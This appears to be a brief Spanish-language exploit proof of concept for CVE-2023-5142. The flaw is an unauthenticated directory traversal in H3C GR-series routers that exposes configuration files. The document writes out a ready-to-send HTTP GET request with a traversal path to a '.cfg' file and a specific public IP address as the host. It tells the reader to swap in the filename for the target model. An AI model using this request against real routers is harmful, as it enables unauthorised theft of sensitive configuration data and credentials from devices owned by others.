
Exploit PoC para CVE-2023-5142 dirigido a los routers de la serie GR de H3C con una vulnerabilidad de recorrido de directorios sin autenticación para extraer archivos de configuración sensibles.
Producto: Router serie GR
versión: todas
calificación: alto riesgo
sitio web: http://www.h3c.com/
Riesgos: Los atacantes pueden explotar esta vulnerabilidad para obtener información sensible de los routers mediante la construcción de paquetes de solicitud especiales que evitan la verificación de identidad.
principio: El router no autentica el acceso a directorios y archivos relacionados
exp:
Nota: Es necesario modificar el sufijo del nombre de archivo en el POC, por ejemplo, GR8300.cfg
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
image
image
image